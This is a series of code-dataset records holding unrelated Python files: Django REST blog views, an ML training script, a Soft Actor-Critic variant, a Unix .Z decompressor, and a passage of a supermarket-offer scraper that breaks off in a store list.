api_view, authentication_classes, permission_classes\nfrom rest_framework.response import Response\nfrom .serializers import BlogPostSerializer\n\nfrom homepage.models import Post\n\n\n# class BlogListAPI(generics.ListCreateAPIView):\n# lookup_field = 'pk'\n# queryset = Post.objects.all()\n# serializer_class = BlogPostSerializer\n# # permission_classes = (IsAdminUser,)\n#\n\n@api_view(['GET'])\ndef apioverview(request):\n api_url = {\n 'List View': '/post-list/',\n 'detail View': '/post-list/str:pk/',\n 'Create': '/post-create/',\n 'update': '/post-update//',\n 'Delete': '/post-delete//',\n }\n # queryset = Post.objects.all()\n # serializer = BlogPostSerializer\n return Response(api_url)\n\n\n@api_view(['GET'])\n@permission_classes([])\ndef post_list(request):\n posts = Post.objects.all().filter(post_available_date__date__lte=date.today()).order_by(\n 'post_available_date').reverse()\n serializer = BlogPostSerializer(posts, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef post_details(request, pk):\n posts = Post.objects.get(post_id=pk)\n serializer = BlogPostSerializer(posts, many=False)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\n# @authentication_classes([SessionAuthentication, BasicAuthentication])\n@permission_classes([IsAuthenticated])\ndef post_create(request):\n serializer = BlogPostSerializer(data=request.data)\n try:\n if serializer.is_valid():\n serializer.save()\n except Exception as e:\n print(e)\n print(serializer.errors)\n return Response(serializer.data)\n", "repo_name": "mamjow/Helvoirt", "sub_path": "homepage/Api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects.all", "line_number": 36, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "homepage.models.Post", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "name"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 34, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "homepage.models.Post.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "homepage.models.Post", "line_number": 44, "usage_type": "name"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 42, "usage_type": "call"}, {"api_name": "serializers.BlogPostSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 
49, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 51, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "5803491742", "text": "import torch\r\nimport argparse\r\nfrom torch.utils.data import Dataset\r\nfrom copy import deepcopy\r\nfrom utils import mydataset, Experiment\r\n\r\nif __name__ == '__main__':\r\n\r\n parser = argparse.ArgumentParser()\r\n args = parser.parse_args(\"\")\r\n dim = parser.parse_args(\"\")\r\n pin_memory = True\r\n\r\n args.main_dir = r'/'\r\n args.data_dir = r'/'\r\n args.train_dir = r'dataset_train'\r\n args.test_dir = r'dataset_test'\r\n args.savefilename = 'RAN_ENV_AB'\r\n args.numberOfWorkers = 16\r\n args.train_batch_size = 24\r\n args.test_batch_size = 24\r\n args.epoch = 250\r\n\r\n device = torch.device(\"cuda:0\")\r\n\r\n args.lr = 5e-6\r\n args.l2 = args.lr * 1e-2\r\n args.lambda1 = 0.0\r\n args.lambda2 = 5e-8\r\n\r\n print('Loading Dataset')\r\n trainset = mydataset.create_dataset(args.data_dir, args.train_dir)\r\n trainset, valset = torch.utils.data.random_split(trainset, [len(trainset) - int(400), int(400)])\r\n testset = mydataset.create_dataset(args.data_dir, args.test_dir)\r\n partition = {'train': trainset, 'val': valset, 'test': testset}\r\n\r\n print('Start Training')\r\n net, setting, result = Experiment.run_experiment(partition, deepcopy(args))\r\n\r\n", "repo_name": "syed-mailab/Learning-based-attenuation-quantification-in-abdominal-ultrasound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.mydataset.create_dataset", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.mydataset", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 33, "usage_type": "attribute"}, {"api_name": "utils.mydataset.create_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.mydataset", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.Experiment.run_experiment", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.Experiment", "line_number": 38, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "17785480680", "text": "import time\nimport numpy as np\nimport copy\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .off_rl_algo import OffRLAlgo\n\nclass EARSAC(OffRLAlgo):\n \"\"\"\n SAC for Emergent Action Representation\n \"\"\"\n\n def __init__(\n self,\n pf_state,pf_task,pf_action,\n qf1, qf2,\n plr, qlr,\n task_nums = 1,\n optimizer_class=optim.Adam,\n\n policy_std_reg_weight=1e-3,\n policy_mean_reg_weight=1e-3,\n\n reparameterization=True,\n automatic_entropy_tuning=True,\n target_entropy=None,\n \n n_std = 0.02,\n \n **kwargs\n ):\n super(EARSAC,self).__init__(**kwargs)\n self.pf_state=pf_state\n self.pf_task=pf_task\n self.pf_action=pf_action\n self.qf1=qf1\n self.qf2=qf2\n\n self.target_qf1 = copy.deepcopy(qf1)\n self.target_qf2 = copy.deepcopy(qf2)\n\n self.to(self.device)\n\n self.plr = plr\n self.qlr = qlr\n\n 
self.optimizer_class = optimizer_class\n self.qf1_optimizer = optimizer_class(\n self.qf1.parameters(),\n lr=self.qlr,\n )\n\n self.qf2_optimizer = optimizer_class(\n self.qf2.parameters(),\n lr=self.qlr,\n )\n\n self.pf_optimizer = optimizer_class(\n (para for para in list(self.pf_state.parameters()) + list(self.pf_task.parameters()) + list(self.pf_action.parameters())),\n lr=self.plr\n )\n\n self.automatic_entropy_tuning = automatic_entropy_tuning\n if self.automatic_entropy_tuning:\n if target_entropy:\n self.target_entropy = target_entropy\n else:\n self.target_entropy = -np.prod(self.env.action_space.shape).item() # from rlkit\n self.log_alpha = torch.zeros(1).to(self.device)\n self.log_alpha.requires_grad_()\n self.alpha_optimizer = optimizer_class(\n [self.log_alpha],\n lr=self.plr,\n )\n self.sample_key = [\"obs\", \"next_obs\", \"acts\", \"rewards\", \"terminals\", \"task_idxs\", \"task_inputs\"]\n self.qf_criterion = nn.MSELoss()\n\n self.policy_std_reg_weight = policy_std_reg_weight\n self.policy_mean_reg_weight = policy_mean_reg_weight\n\n self.reparameterization = reparameterization\n \n self.n_std = n_std\n\n def update(self, batch):\n self.training_update_num += 1\n obs = batch['obs']\n actions = batch['acts']\n next_obs = batch['next_obs']\n rewards = batch['rewards']\n terminals = batch['terminals']\n task_inputs = batch[\"task_inputs\"]\n task_idx = batch['task_idxs']\n\n rewards = torch.Tensor(rewards).to( self.device )\n rewards_scaled = rewards * self.reward_scale\n terminals = torch.Tensor(terminals).to( self.device )\n obs = torch.Tensor(obs).to( self.device )\n actions = torch.Tensor(actions).to( self.device )\n next_obs = torch.Tensor(next_obs).to( self.device )\n task_inputs = torch.Tensor(task_inputs).to(self.device)\n task_idx = torch.Tensor(task_idx).to( self.device ).long()\n\n self.pf_state.train()\n self.pf_task.train()\n self.pf_action.train()\n self.qf1.train()\n self.qf2.train()\n\n \"\"\"\n Policy operations.\n \"\"\"\n lses = self.pf_state.forward(obs)\n ltes = self.pf_task.forward(task_inputs)\n n_mean=torch.zeros_like(ltes)\n n_std=torch.full_like(ltes, self.n_std)\n noise=torch.normal(n_mean,n_std)\n ltes_withnoise=ltes+noise\n \n ltes_withnoise=F.normalize(ltes_withnoise)\n sample_info = self.pf_action.explore(lses, ltes, return_log_probs=True )\n\n mean = sample_info[\"mean\"]\n log_std = sample_info[\"log_std\"]\n new_actions = sample_info[\"action\"]\n log_probs = sample_info[\"log_prob\"]\n\n q1_pred = self.qf1([obs, actions, task_inputs])\n q2_pred = self.qf2([obs, actions, task_inputs])\n\n if self.automatic_entropy_tuning:\n \"\"\"\n Alpha Loss\n \"\"\"\n alpha_loss = -(self.log_alpha * (log_probs + self.target_entropy).detach()).mean()\n self.alpha_optimizer.zero_grad()\n alpha_loss.backward()\n self.alpha_optimizer.step()\n alpha = self.log_alpha.exp().detach()\n else:\n alpha = 1\n alpha_loss = 0\n\n with torch.no_grad():\n lses = self.pf_state.forward(next_obs)\n\n target_sample_info = self.pf_action.explore(lses, ltes, return_log_probs=True )\n\n target_actions = target_sample_info[\"action\"]\n target_log_probs = target_sample_info[\"log_prob\"]\n\n target_q1_pred = self.target_qf1([next_obs, target_actions,task_inputs])\n target_q2_pred = self.target_qf2([next_obs, target_actions,task_inputs])\n min_target_q = torch.min(target_q1_pred, target_q2_pred)\n target_v_values = min_target_q - alpha * target_log_probs\n \"\"\"\n QF Loss\n \"\"\"\n q_target = rewards_scaled + (1. 
- terminals) * self.discount * target_v_values\n qf1_loss = self.qf_criterion(q1_pred, q_target.detach())\n qf2_loss = self.qf_criterion(q2_pred, q_target.detach())\n assert q1_pred.shape == q_target.shape\n assert q2_pred.shape == q_target.shape\n\n q_new_actions = torch.min(\n self.qf1([obs, new_actions,task_inputs]),\n self.qf2([obs, new_actions,task_inputs]))\n \"\"\"\n Policy Loss\n \"\"\"\n if not self.reparameterization:\n raise NotImplementedError\n else:\n assert log_probs.shape == q_new_actions.shape\n policy_loss = ( alpha * log_probs - q_new_actions).mean()\n\n std_reg_loss = self.policy_std_reg_weight * (log_std**2).mean()\n mean_reg_loss = self.policy_mean_reg_weight * (mean**2).mean()\n policy_loss += std_reg_loss + mean_reg_loss\n \n \"\"\"\n Update Networks\n \"\"\"\n self.pf_optimizer.zero_grad()\n policy_loss.backward()\n pf_state_norm = torch.nn.utils.clip_grad_norm_(self.pf_state.parameters(), 10)\n pf_task_norm = torch.nn.utils.clip_grad_norm_(self.pf_task.parameters(), 10)\n pf_action_norm = torch.nn.utils.clip_grad_norm_(self.pf_action.parameters(), 10)\n self.pf_optimizer.step()\n\n self.qf1_optimizer.zero_grad()\n qf1_loss.backward()\n qf1_norm = torch.nn.utils.clip_grad_norm_(self.qf1.parameters(), 10)\n self.qf1_optimizer.step()\n\n self.qf2_optimizer.zero_grad()\n qf2_loss.backward()\n qf2_norm = torch.nn.utils.clip_grad_norm_(self.qf2.parameters(), 10)\n self.qf2_optimizer.step()\n\n self._update_target_networks()\n\n # Information For Logger\n info = {}\n info['Reward_Mean'] = rewards.mean().item()\n\n if self.automatic_entropy_tuning:\n info[\"Alpha\"] = alpha.item()\n info[\"Alpha_loss\"] = alpha_loss.item()\n info['Training/policy_loss'] = policy_loss.item()\n info['Training/qf1_loss'] = qf1_loss.item()\n info['Training/qf2_loss'] = qf2_loss.item()\n\n info['Training/pf_state_norm'] = pf_state_norm.item()\n info['Training/pf_task_norm'] = pf_task_norm.item()\n info['Training/pf_action_norm'] = pf_action_norm.item()\n info['Training/qf1_norm'] = qf1_norm.item()\n info['Training/qf2_norm'] = qf2_norm.item()\n\n info['log_std/mean'] = log_std.mean().item()\n info['log_std/std'] = log_std.std().item()\n info['log_std/max'] = log_std.max().item()\n info['log_std/min'] = log_std.min().item()\n\n info['log_probs/mean'] = log_probs.mean().item()\n info['log_probs/std'] = log_probs.std().item()\n info['log_probs/max'] = log_probs.max().item()\n info['log_probs/min'] = log_probs.min().item()\n\n info['mean/mean'] = mean.mean().item()\n info['mean/std'] = mean.std().item()\n info['mean/max'] = mean.max().item()\n info['mean/min'] = mean.min().item()\n\n return info\n\n @property\n def networks(self):\n return [\n self.pf_state,\n self.pf_task,\n self.pf_action,\n self.qf1,\n self.qf2,\n self.target_qf1,\n self.target_qf2\n ]\n \n @property\n def snapshot_networks(self):\n return [\n [\"pf_state\", self.pf_state],\n [\"pf_task\", self.pf_task],\n [\"pf_action\", self.pf_action],\n [\"qf1\", self.qf1],\n [\"qf2\", self.qf2],\n ]\n\n @property\n def target_networks(self):\n return [\n ( self.qf1, self.target_qf1 ),\n ( self.qf2, self.target_qf2 )\n ]\n", "repo_name": "piao-0429/EAR", "sub_path": "torchrl/algo/off_policy/ear_sac.py", "file_name": "ear_sac.py", "file_ext": "py", "file_size_in_byte": 9422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "off_rl_algo.OffRLAlgo", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": 
"attribute"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 43, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.normal", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 190, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "30965835080", "text": "import argparse\nimport collections.abc\nimport itertools\nimport logging\nimport os\nimport sys\nimport typing\n\nfrom ksf.unix_compress import UnixCompress\n\nlogger = logging.getLogger(__name__)\n\n\nclass UnixCompressCodeIterator(collections.abc.Iterator):\n\tbyte_iterator: typing.Iterator[int]\n\tcode_length: int\n\tcurrent_group: typing.Optional[bytes]\n\tcurrent_byte: int\n\tcurrent_bit: int\n\t\n\tdef __init__(self, bytestr: typing.Iterable[int], code_length: int) -> None:\n\t\tsuper().__init__()\n\t\t\n\t\tself.byte_iterator = iter(bytestr)\n\t\tself.code_length = code_length\n\t\tself.current_group = None\n\t\tself.current_byte = 0\n\t\tself.current_bit = 0\n\t\n\tdef __iter__(self) -> \"UnixCompressCodeIterator\":\n\t\treturn self\n\t\n\tdef _next_bit(self) -> int:\n\t\tif self.current_group is None:\n\t\t\tassert self.current_bit == 0\n\t\t\tassert self.current_byte == 0\n\t\t\t# Read code_length bytes from byte_iterator.\n\t\t\tself.current_group = bytes(itertools.islice(self.byte_iterator, self.code_length))\n\t\t\tif not self.current_group:\n\t\t\t\t# Stop 
once there are no more bytes.\n\t\t\t\traise StopIteration()\n\t\t\n\t\t# Extract the bit at the current position.\n\t\tbit = bool(self.current_group[self.current_byte] & 1 << self.current_bit)\n\t\t\n\t\t# Move to next bit. If necessary, also move to next byte or group.\n\t\tif self.current_bit == 7:\n\t\t\tif self.current_byte == len(self.current_group) - 1:\n\t\t\t\tself.current_group = None\n\t\t\t\tself.current_byte = 0\n\t\t\telse:\n\t\t\t\tself.current_byte += 1\n\t\t\tself.current_bit = 0\n\t\telse:\n\t\t\tself.current_bit += 1\n\t\t\n\t\treturn bit\n\t\n\tdef __next__(self) -> int:\n\t\tcode = 0\n\t\tfor i in range(self.code_length):\n\t\t\tcode |= self._next_bit() << i\n\t\treturn code\n\t\n\tdef discard_current_group(self) -> None:\n\t\tself.current_group = None\n\t\tself.current_byte = 0\n\t\tself.current_bit = 0\n\nclass UnixCompressDecompressor(collections.abc.Iterator):\n\tINITIAL_CODE_LENGTH: typing.ClassVar[int] = 9\n\tINITIAL_DECOMPRESSION_TABLE: typing.ClassVar[typing.Sequence[bytes]] = [bytes([i]) for i in range(256)]\n\t\n\tcode_iterator: UnixCompressCodeIterator\n\tblock_mode: bool\n\tmax_code_length: int\n\tlast_chunk: typing.Optional[bytes]\n\tdecompression_table: typing.List[bytes]\n\t\n\t@classmethod\n\tdef from_struct(cls, struct: UnixCompress) -> \"UnixCompressDecompressor\":\n\t\treturn cls(struct.data, struct.block_mode, struct.max_bits)\n\t\n\t@classmethod\n\tdef decompress_struct(cls, struct: UnixCompress) -> bytes:\n\t\treturn b\"\".join(cls.from_struct(struct))\n\t\n\tdef __init__(self, data: bytes, block_mode: bool, max_code_length: int) -> None:\n\t\tsuper().__init__()\n\t\t\n\t\tself.code_iterator = UnixCompressCodeIterator(data, type(self).INITIAL_CODE_LENGTH)\n\t\tself.block_mode = block_mode\n\t\tself.max_code_length = max_code_length\n\t\tself._reset_decompression_table()\n\t\n\tdef _reset_decompression_table(self) -> None:\n\t\tself.code_iterator.code_length = type(self).INITIAL_CODE_LENGTH\n\t\tself.last_chunk = None\n\t\tself.decompression_table = list(type(self).INITIAL_DECOMPRESSION_TABLE)\n\t\tif self.block_mode:\n\t\t\t# Placeholder entry for the reset code (256).\n\t\t\t# This value should never actually be used!\n\t\t\tself.decompression_table += [b\"\"]\n\t\n\tdef __iter__(self) -> \"UnixCompressDecompressor\":\n\t\treturn self\n\t\n\tdef __next__(self) -> bytes:\n\t\t# Once code_iterator is exhausted, this will raise StopIteration.\n\t\t# The exception will propagate up through __next__ and also stop this iterator.\n\t\tcode = next(self.code_iterator)\n\t\tlogger.debug(f\"Code: {code} ({code:>0{self.code_iterator.code_length}b})\")\n\t\t\n\t\tif code == 256 and self.block_mode:\n\t\t\tlogger.debug(\"-> reset decompression table\")\n\t\t\tself._reset_decompression_table()\n\t\t\tself.code_iterator.discard_current_group()\n\t\t\treturn b\"\"\n\t\telse:\n\t\t\tif code == len(self.decompression_table):\n\t\t\t\t# Special case: if code is exactly one higher than the highest currently valid code, repeat the last chunk and add its first byte once more at the end.\n\t\t\t\t# This is known as the \"KwKwK problem\", because it occurs when the uncompressed data contains a sequence of the form KwKwK (where K is a byte and w is a byte sequence and Kw is already in the compression dictionary). 
For a proper explanation, see https://stackoverflow.com/q/42130786.\n\t\t\t\tlogger.debug(\"KwKwK string (code is one past current end of table)\")\n\t\t\t\tassert self.last_chunk is not None\n\t\t\t\tchunk = self.last_chunk + self.last_chunk[:1]\n\t\t\telse:\n\t\t\t\tchunk = self.decompression_table[code]\n\t\t\t\n\t\t\tlogger.debug(f\"-> {chunk}\")\n\t\t\t\n\t\t\t# Create new codes only if we have a previous chunk and the maximum table size would not be reached.\n\t\t\t# (When the maximum code length is reached, the last slot in the table is never filled.)\n\t\t\tif self.last_chunk is not None and len(self.decompression_table) < (1 << self.max_code_length) - 1:\n\t\t\t\tnew_chunk = self.last_chunk + chunk[:1]\n\t\t\t\tlogger.debug(f\"New table entry: {len(self.decompression_table)} -> {new_chunk}\")\n\t\t\t\tself.decompression_table.append(new_chunk)\n\t\t\t\n\t\t\tif len(self.decompression_table) >= 1 << self.code_iterator.code_length:\n\t\t\t\t# All codes used for current code length, so increase code length by one bit.\n\t\t\t\tself.code_iterator.code_length += 1\n\t\t\t\tlogger.debug(f\"Code length increased to {self.code_iterator.code_length} bits\")\n\t\t\t\tself.code_iterator.discard_current_group()\n\t\t\t\tassert self.code_iterator.code_length <= self.max_code_length\n\t\t\t\n\t\t\tself.last_chunk = chunk\n\t\t\t\n\t\t\treturn chunk\n\n\nCOMPRESS_SUFFIX_MAP = {\n\t\".taZ\": \".tar\",\n\t\".Z\": \"\",\n}\n\ndef get_out_filename(in_filename: str) -> str:\n\tif in_filename == \"-\":\n\t\treturn \"-\"\n\telse:\n\t\tfor suffix_before, suffix_after in COMPRESS_SUFFIX_MAP.items():\n\t\t\tif in_filename.endswith(suffix_before) and in_filename != suffix_before:\n\t\t\t\tout_filename = f\"{in_filename[:-len(suffix_before)]}{suffix_after}\"\n\t\t\t\treturn \"./-\" if out_filename == \"-\" else out_filename\n\t\t\n\t\t# No matching suffix found\n\t\treturn f\"{in_filename}.uncompressed\"\n\ndef tabulate(vals):\n\t# From pfmoore on GitHub:\n\t# https://github.com/pypa/pip/issues/3651#issuecomment-216932564\n\tassert len(vals) > 0\n\t\n\tsizes = [0] * max(len(x) for x in vals)\n\tfor row in vals:\n\t\tsizes = [max(s, len(str(c))) for s, c in itertools.zip_longest(sizes, row)]\n\t\n\tresult = []\n\tfor row in vals:\n\t\tdisplay = \" \".join(\n\t\t\tstr(c).ljust(s) if c is not None else ''\n\t\t\tfor s, c in itertools.zip_longest(sizes, row)\n\t\t)\n\t\tresult.append(display)\n\t\n\treturn result, sizes\n\ndef main():\n\tap = argparse.ArgumentParser(add_help=False, allow_abbrev=False)\n\tap.add_argument(\"--help\", action=\"help\")\n\tap.add_argument(\"-l\", \"--list\", action=\"store_true\", help=\"List contents of the compressed file instead of extracting it\")\n\tap.add_argument(\"-o\", \"--output-file\", type=str, help=\"The output file name, or - for stdout (default: derived from input file name, or - if reading from stdin)\")\n\tap.add_argument(\"file\", type=str, default=\"-\", help=\"The file to decompress, or - for stdin (default: -)\")\n\t\n\targs = ap.parse_args()\n\t\n\tin_filename = args.file\n\tout_filename = args.output_file\n\t\n\tif out_filename is None:\n\t\tout_filename = get_out_filename(in_filename)\n\t\n\tif in_filename == \"-\":\n\t\tin_stream = sys.stdin.buffer\n\telse:\n\t\tin_stream = open(in_filename, \"rb\")\n\t\n\ttry:\n\t\tstruct = UnixCompress.from_io(in_stream)\n\t\t\n\t\tif args.list:\n\t\t\tprint(f\"Contents of {in_filename}:\")\n\t\t\trows, widths = tabulate([\n\t\t\t\t[\"File name\", \"Compressed size\", \"Uncompressed size\", \"Block mode?\", \"Max. 
code bits\"],\n\t\t\t\t[os.path.basename(out_filename), struct._io.size(), len(UnixCompressDecompressor.decompress_struct(struct)), struct.block_mode, struct.max_bits],\n\t\t\t])\n\t\t\trows.insert(1, \" \".join(\"-\"*width for width in widths))\n\t\t\tfor row in rows:\n\t\t\t\tprint(row)\n\t\telse:\n\t\t\tif out_filename == \"-\":\n\t\t\t\tout_stream = sys.stdout.buffer\n\t\t\telse:\n\t\t\t\tout_stream = open(out_filename, \"wb\")\n\t\t\t\n\t\t\ttry:\n\t\t\t\tfor part in UnixCompressDecompressor.from_struct(struct):\n\t\t\t\t\tout_stream.write(part)\n\t\t\tfinally:\n\t\t\t\tif out_filename != \"-\":\n\t\t\t\t\tout_stream.close()\n\tfinally:\n\t\tif in_filename != \"-\":\n\t\t\tin_stream.close()\n\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "dgelessus/ksf_stuff", "sub_path": "archive/unix_compress.py", "file_name": "unix_compress.py", "file_ext": "py", "file_size_in_byte": 7918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.abc.abc", "line_number": 14, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 21, "usage_type": "attribute"}, {"api_name": "itertools.islice", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.abc.abc", "line_number": 70, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.ClassVar", "line_number": 71, "usage_type": "attribute"}, {"api_name": "typing.ClassVar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 72, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 77, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 78, "usage_type": "attribute"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 81, "usage_type": "name"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 85, "usage_type": "name"}, {"api_name": "itertools.zip_longest", "line_number": 174, "usage_type": "call"}, {"api_name": "itertools.zip_longest", "line_number": 180, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 187, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 202, "usage_type": "attribute"}, {"api_name": "ksf.unix_compress.UnixCompress.from_io", "line_number": 207, "usage_type": "call"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 207, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 220, "usage_type": "attribute"}]} +{"seq_id": "15812825728", "text": "#!/usr/bin/env python3\nimport os\nimport arrow\nimport requests\nimport json\nimport subprocess\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib\n\nheaders = {\"User-Agent\": \"Firefox auf Windows. 
Ganz bestimmt.\"}\n\ntmp_file_tegut = \"tegut-angebote.pdf\"\n\nusername = \"\"\npassword = \"\"\nsmtphost = \"beeftraeger.wurbz.de:465\"\nsmtpfrom = username\nsmtpto = \"\"\n\n\ndef get_tegut_angebot_url():\n now = arrow.now()\n return f\"https://static.tegut.com/fileadmin/tegut_upload/Dokumente/Aktuelle_Flugbl%C3%A4tter/tegut-prospekt-kw-{now.week:02}-2022-Hessen-Niedersachsen-Rheinland-Pfalz.pdf\"\n\n\ndef do_tegut():\n print(\"Checking Tegut Angeote\")\n resp = requests.get(get_tegut_angebot_url(), headers=headers)\n assert resp.status_code == 200\n with open(tmp_file_tegut, \"wb\") as f:\n f.write(resp.content)\n print(f\"Downloaded Tegut Angebote to {tmp_file_tegut}\")\n p = subprocess.Popen([\"pdfgrep\", \"-i\", \"mate\", tmp_file_tegut], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n assert p.returncode == 0\n stdout, stderr = p.communicate()\n os.remove(tmp_file_tegut)\n print(stdout.decode())\n return stdout.decode()\n\n\ndef do_rewe():\n \"\"\"\n 240817: REWE Südmarkt GmbH Mitte, Leydhecker Str. 16 None, 64293 Darmstadt\n 241176: REWE Michael Weisbrod oHG, Pallaswiesenstr. 70-72 None, 64293 Darmstadt\n 240660: REWE Markt GmbH, Europaplatz 2 None, 64293 Darmstadt\n 240573: REWE Markt GmbH, Berliner Allee 59 None, 64295 Darmstadt\n 862193: REWE Regiemarkt GmbH, Gutenbergstraße 3-15 / Loop5 None, 64331 Weiterstadt / Riedbahn\n 240270: REWE Markt GmbH, Liebfrauenstr. 34 None, 64289 Darmstadt\n 240164: REWE Markt GmbH, Luisencenter 5 None, 64283 Darmstadt\n 240657: REWE Markt GmbH, Dieburger Str. 24 None, 64287 Darmstadt\n 240070: REWE Markt GmbH, Heinrichstr. 52 None, 64283 Darmstadt\n 240269: REWE Markt GmbH, Schwarzer Weg 9 None, 64287 Darmstadt\n 240225: REWE Markt GmbH, Rüdesheimer Str. 119-123 None, 64285 Darmstadt\n 240801: REWE Markt GmbH, Flughafenstr. 7 None, 64347 Griesheim Darmstadt\n 240795: REWE Markt GmbH, Schneppenhaeuser Str. 21 None, 64331 Weiterstadt / Gräfenhausen\n 240277: REWE Michael Weisbrod oHG, Oberndorfer Straße 111 None, 64347 Griesheim\n 240340: REWE Markt GmbH, Südliche Ringstr. 27 None, 64390 Erzhausen\n 240126: REWE Markt GmbH, Heidelberger Landstr. 236-240 None, 64297 Darmstadt/Eberstadt\n 240166: REWE Markt GmbH, Rheinstr. 47 None, 